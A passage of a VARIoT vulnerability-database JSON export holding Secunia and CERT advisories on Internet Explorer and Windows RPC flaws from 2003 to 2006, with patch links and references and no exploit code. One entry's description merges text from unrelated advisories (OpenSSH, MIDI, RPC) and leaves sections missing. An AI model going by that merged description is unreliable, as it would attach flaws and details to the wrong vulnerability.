"data": "Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow \"window content to persist\" after the user has navigated to another site, aka the \"Address Bar Spoofing Vulnerability.\" NOTE: this is a different vulnerability than CVE-2006-1626. Microsoft Internet Explorer is prone to address-bar spoofing. Attackers may exploit this via a malicious web page to spoof the contents of a page that the victim may trust. This vulnerability may be useful in phishing or other attacks that rely on content spoofing. \n\nTITLE:\nInternet Explorer Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA18957\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/18957/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nSpoofing, System access, Cross Site Scripting\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in Internet Explorer,\nwhich can be exploited by malicious people to conduct cross-site\nscripting attacks, conduct phishing attacks, or compromise a user\u0027s\nsystem. \n\n1) An error in the cross-domain restriction when accessing properties\nof certain dynamically created objects can be exploited to execute\narbitrary HTML and script code in a user\u0027s browser session in context\nof an arbitrary site via a JavaScript URI handler applied on a\ndynamically created \"object\" tag. \n\n2) An error within the handling of multiple event handlers (e.g. \nonLoad) in an HTML element can be exploited to corrupt memory in a\nway that may allow execution of arbitrary code. 
\n\n3) An error within the parsing of specially crafted, non-valid HTML\ncan be exploited to corrupt memory in a way that allows execution of\narbitrary code when a malicious HTML document is viewed. \n\n4) An error within the instantiation of COM objects that are not\nintended to be instantiated in Internet Explorer can be exploited to\ncorrupt memory in a way that allows execution of arbitrary code. \n\n5) An error within the handling of HTML elements containing a\nspecially crafted tag can be exploited to corrupt memory in a way\nthat allows execution of arbitrary code. \n\n6) An error within the handling of double-byte characters in\nspecially crafted URLs can be exploited to corrupt memory in a way\nthat allows execution of arbitrary code. \n\nSuccessful exploitation requires that the system uses double-byte\ncharacter sets. \n\n7) An error in the way IOleClientSite information is returned when an\nembedded object is dynamically created can be exploited to execute\narbitrary code in context of another site or security zone. \n\n8) An unspecified error can be exploited to spoof information\ndisplayed in the address bar and other parts of the trust UI. \n\n9) Some unspecified vulnerabilities exist in the two ActiveX controls\nincluded with Danim.dll and Dxtmsft.dll. \n\nSOLUTION:\nApply patches. 
\n\nInternet Explorer 5.01 SP4 on Windows 2000 SP4:\nhttp://www.microsoft.com/downloa...7B87-AF8F-4346-9164-596E3E5C22B1\n\nInternet Explorer 6 SP1 on Windows 2000 SP4 or Windows XP SP1:\nhttp://www.microsoft.com/downloa...41E1-2B36-4696-987A-099FC57E0129\n\nInternet Explorer 6 for Windows XP SP2:\nhttp://www.microsoft.com/downloa...FB31-E6B4-4771-81F1-4ACCEBF72133\n\nInternet Explorer 6 for Windows Server 2003 and Windows Server 2003\nSP1:\nhttp://www.microsoft.com/downloa...6871-D217-41D3-BECC-B27FAFA00054\n\nInternet Explorer 6 for Windows Server 2003 for Itanium-based systems\nand Windows Server 2003 with SP1 for Itanium-based systems:\nhttp://www.microsoft.com/downloa...957C-0ABE-4129-ABAF-AA2852AD62A3\n\nInternet Explorer 6 for Windows Server 2003 x64 Edition:\nhttp://www.microsoft.com/downloa...8BE3-39EE-4937-9BD1-280FC35125C6\n\nInternet Explorer 6 for Windows XP Professional x64 Edition:\nhttp://www.microsoft.com/downloa...FE3E-620A-4BBC-868B-CA2D9EFF7AC3\n\nInternet Explorer 6 SP1 on Windows 98, Windows 98 SE, or Windows ME:\nPatches are available via the Microsoft Update Web site or the\nWindows Update Web site. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) Discovered by anonymous person. \n2) Michal Zalewski\n3) The vendor credits Jan P. Monsch, Compass Security Network\nComputing. \n4) The vendor credits Richard M. Smith, Boston Software Forensics. \n5) The vendor credits Thomas Waldegger. \n6) The vendor credits Sowhat, Nevis Labs. \n7) The vendor credits Heiko Schultze, SAP. \n9) The vendor credits Will Dormann, CERT/CC. \n\nORIGINAL ADVISORY:\nMS06-013 (KB912812):\nhttp://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. 
\n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "PACKETSTORM",
"id": "45341"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-17300",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "17460",
"trust": 2.8
},
{
"db": "NVD",
"id": "CVE-2006-1192",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "18957",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1015899",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-1318",
"trust": 1.7
},
{
"db": "SREASON",
"id": "670",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "1838",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-17300",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45341",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "PACKETSTORM",
"id": "45341"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"id": "VAR-200604-0205",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T11:04:15.109000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms06-013.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/17460"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1336"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1498"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1645"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1725"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1740"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015899"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18957"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/670"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/1318"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25557"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/18957/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1192"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2006/1318"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1192"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/217"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/220"
},
{
"trust": 0.4,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"trust": 0.3,
"url": "http://www.mozilla.com/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...fe3e-620a-4bbc-868b-ca2d9eff7ac3"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...8be3-39ee-4937-9bd1-280fc35125c6"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...fb31-e6b4-4771-81f1-4accebf72133"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...957c-0abe-4129-abaf-aa2852ad62a3"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...7b87-af8f-4346-9164-596e3e5c22b1"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...41e1-2b36-4696-987a-099fc57e0129"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/downloa...6871-d217-41d3-becc-b27fafa00054"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "PACKETSTORM",
"id": "45341"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "PACKETSTORM",
"id": "45341"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-17300"
},
{
"date": "2006-04-11T00:00:00",
"db": "BID",
"id": "17460"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"date": "2006-04-12T04:04:04",
"db": "PACKETSTORM",
"id": "45341"
},
{
"date": "2006-04-11T23:02:00",
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"date": "2006-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "VULHUB",
"id": "VHN-17300"
},
{
"date": "2006-04-17T17:12:00",
"db": "BID",
"id": "17460"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"date": "2021-07-23T12:17:15.613000",
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer Vulnerable to address bar spoofing",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
],
"trust": 0.6
}
}
VAR-200306-0042
Vulnerability from variot - Updated: 2022-05-08 07:26
Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities is unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. A Microsoft Windows DirectX library, quartz.dll, does not properly validate certain parameters in Musical Instrument Digital Interface (MIDI) files. A remotely exploitable vulnerability has been discovered in Internet Explorer. A remote attacker could execute arbitrary code with the privileges of the user running IE. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, an internal memory buffer will be overrun.
Description
Microsoft Windows operating systems include multimedia technologies called DirectX and DirectShow. From Microsoft Security Bulletin MS03-030, "DirectX consists of a set of low-level Application Programming Interfaces (APIs) that are used by Windows programs for multimedia support.
Any application that uses DirectX/DirectShow to process MIDI files may be affected by this vulnerability. Of particular concern, Internet Explorer (IE) uses the Windows Media Player ActiveX control and quartz.dll to handle MIDI files embedded in HTML documents. An attacker could therefore exploit this vulnerability by convincing a victim to view an HTML document, such as a web page or an HTML email message, that contains an embedded MIDI file. Note that in addition to IE, a number of applications, including Outlook, Outlook Express, Eudora, AOL, Lotus Notes, and Adobe PhotoDeluxe, use the WebBrowser ActiveX control to interpret HTML documents.
Further technical details are available in eEye Digital Security advisory AD20030723. Common Vulnerabilities and Exposures (CVE) refers to these vulnerabilities as CAN-2003-0346.
Disable embedded MIDI files
Change the Run ActiveX controls and plug-ins security setting to Disable in the Internet zone and the zone(s) used by Outlook, Outlook Express, and any other application that uses the WebBrowser ActiveX control to render HTML. This modification will prevent MIDI files from being automatically loaded from HTML documents. This workaround is not a complete solution and will not prevent attacks that attempt to load MIDI files directly.
Instructions for modifying IE security zone settings can be found in the CERT/CC Malicious Web Scripts FAQ.
References
* CERT/CC Vulnerability Note VU#561284 -
http://www.kb.cert.org/vuls/id/561284
* CERT/CC Vulnerability Note VU#265232 -
http://www.kb.cert.org/vuls/id/265232
* eEye Digital Security advisory AD20030723 -
http://www.eeye.com/html/Research/Advisories/AD20030723.html
* Microsoft Security Bulletin MS03-030 -
http://microsoft.com/technet/security/bulletin/MS03-030.asp
* Microsoft Knowledge Base article 819696 -
http://support.microsoft.com/default.aspx?scid=kb;en-us;819696
_________________________________________________________________
These vulnerabilities were researched and reported by eEye Digital Security.
Feedback can be directed to the author, Art Manion.
CERT Summary CS-2003-04
November 24, 2003
Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.
Past CERT summaries are available from:
CERT Summaries
http://www.cert.org/summaries/
Recent Activity
Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange.
For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.
CERT/CC Current Activity
http://www.cert.org/current/current_activity.html
1. W32/Mimail Variants
The CERT/CC has received reports of several new variants of the
'Mimail' worm. The most recent variant of the worm (W32/Mimail.J)
arrives as an email message alleging to be from the Paypal
financial service. The message requests that the recipient
'verify' their account information to prevent the suspension of
their Paypal account. Attached to the email is an executable file
which captures this information (if entered), and sends it to a
number of email addresses.
Current Activity - November 19, 2003
http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili
2.
CERT Advisory CA-2003-28
Buffer Overflow in Windows Workstation Service
http://www.cert.org/advisories/CA-2003-28.html
Vulnerability Note VU#567620
Microsoft Windows Workstation service vulnerable to
buffer overflow when sent specially crafted network
message
http://www.kb.cert.org/vuls/id/567620
3.
CERT Advisory CA-2003-27
Multiple Vulnerabilities in Microsoft Windows and
Exchange
http://www.cert.org/advisories/CA-2003-27.html
Vulnerability Note VU#575892
Buffer overflow in Microsoft Windows Messenger Service
http://www.kb.cert.org/vuls/id/575892
Vulnerability Note VU#422156
Microsoft Exchange Server fails to properly handle
specially crafted SMTP extended verb requests
http://www.kb.cert.org/vuls/id/422156
Vulnerability Note VU#467036
Microsoft Windows Help and support Center contains buffer
overflow in code used to handle HCP protocol
http://www.kb.cert.org/vuls/id/467036
Vulnerability Note VU#989932
Microsoft Windows contains buffer overflow in Local
Troubleshooter ActiveX control (Tshoot.ocx)
http://www.kb.cert.org/vuls/id/989932
Vulnerability Note VU#838572
Microsoft Windows Authenticode mechanism installs ActiveX
controls without prompting user
http://www.kb.cert.org/vuls/id/838572
Vulnerability Note VU#435444
Microsoft Outlook Web Access (OWA) contains cross-site
scripting vulnerability in the "Compose New Message" form
http://www.kb.cert.org/vuls/id/435444
Vulnerability Note VU#967668
Microsoft Windows ListBox and ComboBox controls vulnerable
to buffer overflow when supplied crafted Windows message
http://www.kb.cert.org/vuls/id/967668
4. Multiple Vulnerabilities in SSL/TLS Implementations
Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)
and Transport Layer Security (TLS) protocols allowing an attacker
to execute arbitrary code or cause a denial-of-service condition.
CERT Advisory CA-2003-26
Multiple Vulnerabilities in SSL/TLS Implementations
http://www.cert.org/advisories/CA-2003-26.html
Vulnerability Note VU#935264
OpenSSL ASN.1 parser insecure memory deallocation
http://www.kb.cert.org/vuls/id/935264
Vulnerability Note VU#255484
OpenSSL contains integer overflow handling ASN.1 tags (1)
http://www.kb.cert.org/vuls/id/255484
Vulnerability Note VU#380864
OpenSSL contains integer overflow handling ASN.1 tags (2)
http://www.kb.cert.org/vuls/id/380864
Vulnerability Note VU#686224
OpenSSL does not securely handle invalid public key when
configured to ignore errors
http://www.kb.cert.org/vuls/id/686224
Vulnerability Note VU#732952
OpenSSL accepts unsolicited client certificate messages
http://www.kb.cert.org/vuls/id/732952
Vulnerability Note VU#104280
Multiple vulnerabilities in SSL/TLS implementations
http://www.kb.cert.org/vuls/id/104280
Vulnerability Note VU#412478
OpenSSL 0.9.6k does not properly handle ASN.1 sequences
http://www.kb.cert.org/vuls/id/412478
5. These attacks include the
installation of tools for launching distributed denial-of-service
(DDoS) attacks, providing generic proxy services, reading
sensitive information from the Windows registry, and using a
victim system's modem to dial pay-per-minute services. The
vulnerability described in VU#865940 exists due to an interaction
between IE's MIME type processing and the way it handles HTML
application (HTA) files embedded in OBJECT tags. W32/Swen.A Worm
On September 19, the CERT/CC began receiving a large volume of
reports of a mass mailing worm, referred to as W32/Swen.A,
spreading on the Internet. Similar to W32/Gibe.B in function, this
worm arrives as an attachment claiming to be a Microsoft Internet
Explorer Update or a delivery failure notice from qmail. The
W32/Swen.A worm requires a user to execute the attachment either
manually or by using an email client that will open the attachment
automatically. Upon opening the attachment, the worm attempts to
mail itself to all email addresses it finds on the system. The
CERT/CC updated the current activity page to contain further
information on this worm.
Current Activity - September 19, 2003
http://www.cert.org/current/archive/2003/09/19/archive.html#swena
7. Buffer Overflow in Sendmail
Sendmail, a widely deployed mail transfer agent (MTA), contains a
vulnerability that could allow an attacker to execute arbitrary
code with the privileges of the sendmail daemon, typically root.
CERT Advisory CA-2003-25
Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-25.html
Vulnerability Note VU#784980
Sendmail prescan() buffer overflow vulnerability
http://www.kb.cert.org/vuls/id/784980
8. RPCSS Vulnerabilities in Microsoft Windows
On September 10, the CERT/CC reported on three vulnerabilities
that affect numerous versions of Microsoft Windows, two of which
are remotely exploitable buffer overflows that may an allow an
attacker to execute code with system privileges.
CERT Advisory CA-2003-23
RPCSS Vulnerabilities in Microsoft Windows
http://www.cert.org/advisories/CA-2003-23.html
Vulnerability Note VU#483492
Microsoft Windows RPCSS Service contains heap overflow in
DCOM activation routines
http://www.kb.cert.org/vuls/id/483492
Vulnerability Note VU#254236
Microsoft Windows RPCSS Service contains heap overflow in
DCOM request filename handling
http://www.kb.cert.org/vuls/id/254236
Vulnerability Note VU#326746
Microsoft Windows RPC service vulnerable to
denial of service
http://www.kb.cert.org/vuls/id/326746
New CERT Coordination Center (CERT/CC) PGP Key
On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc
Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
What's New and Updated
Since the last CERT Summary, we have published new and updated
* Advisories - http://www.cert.org/advisories/
* Vulnerability Notes - http://www.kb.cert.org/vuls
* CERT/CC Statistics - http://www.cert.org/stats/cert_stats.html
* Congressional Testimony - http://www.cert.org/congressional_testimony
* Training Schedule - http://www.cert.org/training/
* CSIRT Development - http://www.cert.org/csirts/
This document is available from: http://www.cert.org/summaries/CS-2003-04.html
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address: CERT Coordination Center, Software Engineering Institute, Carnegie Mellon University, Pittsburgh PA 15213-3890, U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message
subscribe cert-advisory
- "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright © 2003 Carnegie Mellon University.
CERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC Interface
Original issue date: July 31, 2003 Last revised: - Source: CERT/CC
A complete revision history is at the end of this file.
I. Known exploits target TCP port 135 and create a privileged backdoor command shell on successfully compromised hosts. Some versions of the exploit use TCP port 4444 for the backdoor, and other versions use a TCP port number specified by the intruder at run-time. We have also received reports of scanning activity for common backdoor ports such as 4444/TCP. In some cases, due to the RPC service terminating, a compromised system may reboot after the backdoor is accessed by an intruder. Based on current information, we believe this vulnerability is separate and independent from the RPC vulnerability addressed in MS03-026. The CERT/CC is tracking this additional vulnerability as VU#326746 and is continuing to work to understand the issue and mitigation strategies.
In both of the attacks described above, a TCP session to port 135 is used to execute the attack. However, access to TCP ports 139 and 445 may also provide attack vectors and should be considered when applying mitigation strategies.
II.
III. Solutions
Apply patches
All users are encouraged to apply the patches referred to in Microsoft Security Bulletin MS03-026 as soon as possible in order to mitigate the vulnerability described in VU#568148. These patches are also available via Microsoft's Windows Update service.
Systems running Windows 2000 may still be vulnerable to at least a denial of service attack via VU#326746 if their DCOM RPC service is available via the network. Therefore, sites are encouraged to use the packet filtering tips below in addition to applying the patches supplied in MS03-026.
Filter network traffic
Sites are encouraged to block network access to the RPC service at network borders. This can minimize the potential of denial-of-service attacks originating from outside the perimeter. The specific services that should be blocked include
* 135/TCP
* 135/UDP
* 139/TCP
* 139/UDP
* 445/TCP
* 445/UDP
If access cannot be blocked for all external hosts, the CERT/CC recommends limiting access to only those hosts that require it for normal operation. As a general rule, the CERT/CC recommends filtering all types of network traffic that are not required for normal operation.
Because current exploits for VU#568148 create a backdoor, which is in some cases 4444/TCP, blocking inbound TCP sessions to ports on which no legitimate services are provided may limit intruder access to compromised hosts.
Recovering from a system compromise
If you believe a system under your administrative control has been compromised, please follow the steps outlined in "Steps for Recovering from a UNIX or NT System Compromise".
Reporting
The CERT/CC is tracking activity related to exploitation of the first vulnerability (VU#568148) as CERT#27479 and the second vulnerability (VU#326746) as CERT#24523. Relevant artifacts or activity can be sent to cert@cert.org with the appropriate CERT# in the subject line.
Appendix A. Vendor Information
This appendix contains information provided by vendors. If a vendor is not listed below, we have not received their comments.
Microsoft
Please see Microsoft Security Bulletin MS03-026.
Appendix B
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200306-0042",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 4.0,
"vendor": "microsoft",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 2.1,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandriva",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": null,
"scope": null,
